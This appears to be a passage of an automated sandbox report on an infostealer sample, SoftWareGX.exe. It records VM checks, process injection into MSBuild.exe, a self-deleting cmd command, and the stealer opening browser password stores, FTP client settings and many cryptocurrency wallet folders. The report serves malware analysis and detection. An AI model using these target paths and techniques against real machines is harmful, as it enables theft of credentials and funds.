                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\
                Source: Web Data.21.dr | Binary or memory string: outlook.office365.comVMware20,11696584680t
                Source: Amcache.hve.15.dr | Binary or memory string: VMware
                Source: Web Data.21.dr | Binary or memory string: Interactive Brokers - COM.HKVMware20,11696584680
                Source: Web Data.21.dr | Binary or memory string: Canara Change Transaction PasswordVMware20,11696584680^
                Source: Web Data.21.dr | Binary or memory string: Interactive Brokers - EU WestVMware20,11696584680n
                Source: Web Data.21.dr | Binary or memory string: microsoft.visualstudio.comVMware20,11696584680x
                Source: Amcache.hve.15.dr | Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                Source: Web Data.21.dr | Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696584680
                Source: MSBuild.exe, 0000000F.00000002.2006634073.0000000000F58000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 0000000F.00000002.2006634073.0000000000FBE000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
                Source: Web Data.21.dr | Binary or memory string: outlook.office.comVMware20,11696584680s
                Source: Web Data.21.dr | Binary or memory string: secure.bankofamerica.comVMware20,11696584680|UE
                Source: Web Data.21.dr | Binary or memory string: Canara Transaction PasswordVMware20,11696584680x
                Source: Amcache.hve.15.dr | Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
                Source: Web Data.21.dr | Binary or memory string: Canara Transaction PasswordVMware20,11696584680}
                Source: Web Data.21.dr | Binary or memory string: bankofamerica.comVMware20,11696584680x
                Source: Amcache.hve.15.dr | Binary or memory string: vmci.sys
                Source: Web Data.21.dr | Binary or memory string: turbotax.intuit.comVMware20,11696584680t
                Source: Web Data.21.dr | Binary or memory string: Test URL for global passwords blocklistVMware20,11696584680
                Source: Web Data.21.dr | Binary or memory string: www.interactivebrokers.comVMware20,11696584680}
                Source: Web Data.21.dr | Binary or memory string: AMC password management pageVMware20,11696584680
                Source: Amcache.hve.15.dr | Binary or memory string: VMware20,1
                Source: Amcache.hve.15.dr | Binary or memory string: Microsoft Hyper-V Generation Counter
                Source: Amcache.hve.15.dr | Binary or memory string: NECVMWar VMware SATA CD00
                Source: Amcache.hve.15.dr | Binary or memory string: VMware Virtual disk SCSI Disk Device
                Source: Web Data.21.dr | Binary or memory string: interactivebrokers.comVMware20,11696584680
                Source: Amcache.hve.15.dr | Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
                Source: Web Data.21.dr | Binary or memory string: tasks.office.comVMware20,11696584680o
                Source: Amcache.hve.15.dr | Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
                Source: Amcache.hve.15.dr | Binary or memory string: VMware PCI VMCI Bus Device
                Source: Amcache.hve.15.dr | Binary or memory string: VMware VMCI Bus Device
                Source: Amcache.hve.15.dr | Binary or memory string: VMware Virtual RAM
                Source: Amcache.hve.15.dr | Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
                Source: Amcache.hve.15.dr | Binary or memory string: vmci.inf_amd64_68ed49469341f563
                Source: Amcache.hve.15.dr | Binary or memory string: VMware Virtual USB Mouse
                Source: Amcache.hve.15.dr | Binary or memory string: vmci.syshbin
                Source: Amcache.hve.15.dr | Binary or memory string: VMware, Inc.
                Source: Web Data.21.dr | Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696584680p
                Source: Web Data.21.dr | Binary or memory string: Interactive Brokers - HKVMware20,11696584680]
                Source: Amcache.hve.15.drBinary or memory string: VMware20,1hbin@
                Source: Amcache.hve.15.drBinary or memory string: VMware-42 27 c8 0c e4 52 1d cc-a0 8f d3 a4 82 3e 8f 04
                Source: Amcache.hve.15.drBinary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
                Source: Amcache.hve.15.drBinary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
                Source: Amcache.hve.15.drBinary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                Source: Web Data.21.drBinary or memory string: account.microsoft.com/profileVMware20,11696584680u
                Source: Web Data.21.drBinary or memory string: ms.portal.azure.comVMware20,11696584680
                Source: Web Data.21.drBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696584680
                Source: Amcache.hve.15.drBinary or memory string: c:/windows/system32/drivers/vmci.sys
                Source: Amcache.hve.15.drBinary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                Source: SoftWareGX.exe, 00000005.00000002.1304719584.0000000002019000.00000004.00000020.00020000.00000000.sdmp, msedge.exe, 00000013.00000002.1542249529.000002028A443000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                Source: Amcache.hve.15.drBinary or memory string: vmci.syshbin`
                Source: Web Data.21.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696584680
                Source: Amcache.hve.15.drBinary or memory string: \driver\vmci,\driver\pci
                Source: Amcache.hve.15.drBinary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                Source: Web Data.21.drBinary or memory string: www.interactivebrokers.co.inVMware20,11696584680~
                Source: Web Data.21.drBinary or memory string: trackpan.utiitsl.comVMware20,11696584680h
                Source: Web Data.21.drBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696584680z
                Source: Amcache.hve.15.drBinary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
                Source: Web Data.21.drBinary or memory string: discord.comVMware20,11696584680f
                Source: Web Data.21.drBinary or memory string: netportal.hdfcbank.comVMware20,11696584680
                Source: Web Data.21.drBinary or memory string: global block list test formVMware20,11696584680
                Source: Web Data.21.drBinary or memory string: dev.azure.comVMware20,11696584680j
                Source: Web Data.21.drBinary or memory string: interactivebrokers.co.inVMware20,11696584680d
                Source: C:\Users\user\Desktop\SoftWareGX.exeProcess information queried: ProcessInformationJump to behavior
                Source: C:\Users\user\Desktop\SoftWareGX.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Users\user\Desktop\SoftWareGX.exeMemory allocated: page read and write | page guardJump to behavior

                HIPS / PFW / Operating System Protection Evasion

Source: 5.2.SoftWareGX.exe.3d95ec4.3.raw.unpack, Employee.cs | Reference to suspicious API methods: Marshal.GetDelegateForFunctionPointer(GetProcAddress(LoadLibraryA(ref libraryName), ref methodName), typeof(T))
Source: 5.2.SoftWareGX.exe.3d95ec4.3.raw.unpack, Employee.cs | Reference to suspicious API methods: Marshal.GetDelegateForFunctionPointer(GetProcAddress(LoadLibraryA(ref libraryName), ref methodName), typeof(T))
Source: 5.2.SoftWareGX.exe.3d95ec4.3.raw.unpack, Employee.cs | Reference to suspicious API methods: VirtualAllocEx(processInfo.ProcessHandle, num3, length, 12288, 64)
Source: C:\Users\user\Desktop\SoftWareGX.exe | Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000 protect: page execute and read and write
Source: C:\Users\user\Desktop\SoftWareGX.exe | File written: C:\Users\user\AppData\Local\Temp\yomkssf4\yomkssf4.0.cs
Source: C:\Users\user\Desktop\SoftWareGX.exe | File written: C:\Users\user\AppData\Local\Temp\m3uz1vzd\m3uz1vzd.0.cs
Source: C:\Users\user\Desktop\SoftWareGX.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\Desktop\SoftWareGX.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000
Source: C:\Users\user\Desktop\SoftWareGX.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 401000
Source: C:\Users\user\Desktop\SoftWareGX.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 42F000
Source: C:\Users\user\Desktop\SoftWareGX.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 43A000
Source: C:\Users\user\Desktop\SoftWareGX.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 442000
Source: C:\Users\user\Desktop\SoftWareGX.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 443000
Source: C:\Users\user\Desktop\SoftWareGX.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 444000
Source: C:\Users\user\Desktop\SoftWareGX.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: AE9008
Source: C:\Users\user\Desktop\SoftWareGX.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\m3uz1vzd\m3uz1vzd.cmdline"
Source: C:\Users\user\Desktop\SoftWareGX.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\yomkssf4\yomkssf4.cmdline"
Source: C:\Users\user\Desktop\SoftWareGX.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
Source: C:\Users\user\Desktop\SoftWareGX.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
Source: C:\Users\user\Desktop\SoftWareGX.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESEA88.tmp" "c:\Users\user\AppData\Local\Temp\m3uz1vzd\CSC1F5D4801F4546F0859A2F6C82D3A873.TMP"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESF054.tmp" "c:\Users\user\AppData\Local\Temp\yomkssf4\CSC4D1794474874449F96D662C038F0859C.TMP"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\xl6pp" & exit
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: GetLocaleInfoA,15_2_0041978F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Users\user\Desktop\SoftWareGX.exe | Queries volume information: C:\Users\user\Desktop\SoftWareGX.exe VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 15_2_004241F0 EntryPoint,GetUserNameW,15_2_004241F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 15_2_00419706 GetTimeZoneInformation,15_2_00419706
Source: C:\Users\user\Desktop\SoftWareGX.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Source: Amcache.hve.15.dr | Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
Source: Amcache.hve.15.dr | Binary or memory string: msmpeng.exe
Source: Amcache.hve.15.dr | Binary or memory string: c:\program files\windows defender\msmpeng.exe
Source: Amcache.hve.15.dr | Binary or memory string: MsMpEng.exe

                Stealing of Sensitive Information

Source: Yara match | File source: sslproxydump.pcap, type: PCAP
Source: Yara match | File source: 15.2.MSBuild.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0000000F.00000002.2005647226.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: MSBuild.exe PID: 6364, type: MEMORYSTR
Source: MSBuild.exe, 0000000F.00000002.2009908390.0000000003C4E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: \Electrum-LTC\wallets\
Source: MSBuild.exe, 0000000F.00000002.2009908390.0000000003C4E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: \ElectronCash\wallets\
Source: MSBuild.exe, 0000000F.00000002.2009908390.0000000003C4E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: \Electrum\wallets\
Source: MSBuild.exe, 0000000F.00000002.2009908390.0000000003C4E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: window-state.json
Source: MSBuild.exe, 0000000F.00000002.2009908390.0000000003C4E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: exodus.conf.json
Source: MSBuild.exe, 0000000F.00000002.2009908390.0000000003C4E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: \Exodus\exodus.wallet\
Source: MSBuild.exe, 0000000F.00000002.2006634073.0000000000F9E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: info.seco
Source: MSBuild.exe, 0000000F.00000002.2006634073.0000000000F9E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: ElectrumLTC
Source: MSBuild.exe, 0000000F.00000002.2006634073.0000000000F9E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: passphrase.json
Source: MSBuild.exe, 0000000F.00000002.2006634073.0000000000F9E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: \Ethereum\
Source: MSBuild.exe, 0000000F.00000002.2009908390.0000000003C4E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: exodus.conf.json
Source: MSBuild.exe, 0000000F.00000002.2006634073.0000000000F9E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: \Ethereum\
Source: MSBuild.exe, 0000000F.00000002.2006634073.0000000000FBE000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: \Coinomi\Coinomi\wallets\
Source: MSBuild.exe, 0000000F.00000002.2009908390.0000000003C4E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: \Exodus\exodus.wallet\
Source: MSBuild.exe, 0000000F.00000002.2009908390.0000000003C4E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: multidoge.wallet
Source: MSBuild.exe, 0000000F.00000002.2006634073.0000000000F9E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: seed.seco
Source: MSBuild.exe, 0000000F.00000002.2006634073.0000000000F9E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: keystore
Source: MSBuild.exe, 0000000F.00000002.2009908390.0000000003C4E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: \Electrum-LTC\wallets\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\monero-project\monero-core
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Key opened: HKEY_CURRENT_USER\Software\Martin Prikryl\WinSCP 2\Configuration
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\sp4c0p22.default-release\bookmarkbackups\key4.db
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\sp4c0p22.default-release\storage\permanent\chrome\idb\3561288849sdhlie.files\key4.db
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\sp4c0p22.default-release\crashes\events\key4.db
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\sp4c0p22.default-release\datareporting\glean\db\key4.db
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\sp4c0p22.default-release\storage\temporary\key4.db
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\sp4c0p22.default-release\key4.db
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\sp4c0p22.default-release\cookies.sqlite
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\sp4c0p22.default-release\datareporting\key4.db
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\sp4c0p22.default-release\saved-telemetry-pings\key4.db
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\sp4c0p22.default-release\datareporting\glean\tmp\key4.db
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\sp4c0p22.default-release\datareporting\glean\events\key4.db
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\sp4c0p22.default-release\storage\permanent\key4.db
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\sp4c0p22.default-release\prefs.js
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\sp4c0p22.default-release\crashes\key4.db
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\sp4c0p22.default-release\storage\permanent\chrome\idb\1657114595AmcateirvtiSty.files\key4.db
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\m8f4v4pw.default\key4.db
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\sp4c0p22.default-release\sessionstore-backups\key4.db
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\sp4c0p22.default-release\storage\permanent\chrome\idb\1451318868ntouromlalnodry--epcr.files\key4.db
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\sp4c0p22.default-release\storage\permanent\chrome\key4.db
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\sp4c0p22.default-release\storage\permanent\chrome\idb\key4.db
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\sp4c0p22.default-release\datareporting\glean\key4.db
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\sp4c0p22.default-release\places.sqlite
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\sp4c0p22.default-release\storage\default\key4.db
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\sp4c0p22.default-release\datareporting\archived\key4.db
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\sp4c0p22.default-release\datareporting\archived\2023-10\key4.db
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\sp4c0p22.default-release\datareporting\glean\pending_pings\key4.db
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\sp4c0p22.default-release\storage\permanent\chrome\idb\2918063365piupsah.files\key4.db
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\sp4c0p22.default-release\storage\to-be-removed\key4.db
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\sp4c0p22.default-release\minidumps\key4.db
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\sp4c0p22.default-release\security_state\key4.db
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\sp4c0p22.default-release\storage\permanent\chrome\idb\2823318777ntouromlalnodry--naod.files\key4.db
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\key4.db
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\sp4c0p22.default-release\storage\key4.db
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\sp4c0p22.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.files\key4.db
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | File opened: C:\Users\user\AppData\Roaming\Exodus\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | File opened: C:\Users\user\AppData\Roaming\Exodus\backups\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | File opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | File opened: C:\Users\user\AppData\Roaming\MultiDoge\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | File opened: C:\Users\user\AppData\Roaming\Binance\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | File opened: C:\Users\user\AppData\Roaming\Ledger Live\Local Storage\leveldb\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | File opened: C:\Users\user\AppData\Roaming\Ledger Live\Session Storage\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | File opened: C:\Users\user\AppData\Roaming\Ledger Live\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | File opened: C:\Users\user\AppData\Roaming\atomic_qt\config\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | File opened: C:\Users\user\AppData\Roaming\atomic_qt\exports\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | File opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb\
Source: Yara match | File source: Process Memory Space: MSBuild.exe PID: 6364, type: MEMORYSTR

                Remote Access Functionality

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
Source: Yara match | File source: sslproxydump.pcap, type: PCAP
Source: Yara match | File source: 15.2.MSBuild.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0000000F.00000002.2005647226.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: MSBuild.exe PID: 6364, type: MEMORYSTR
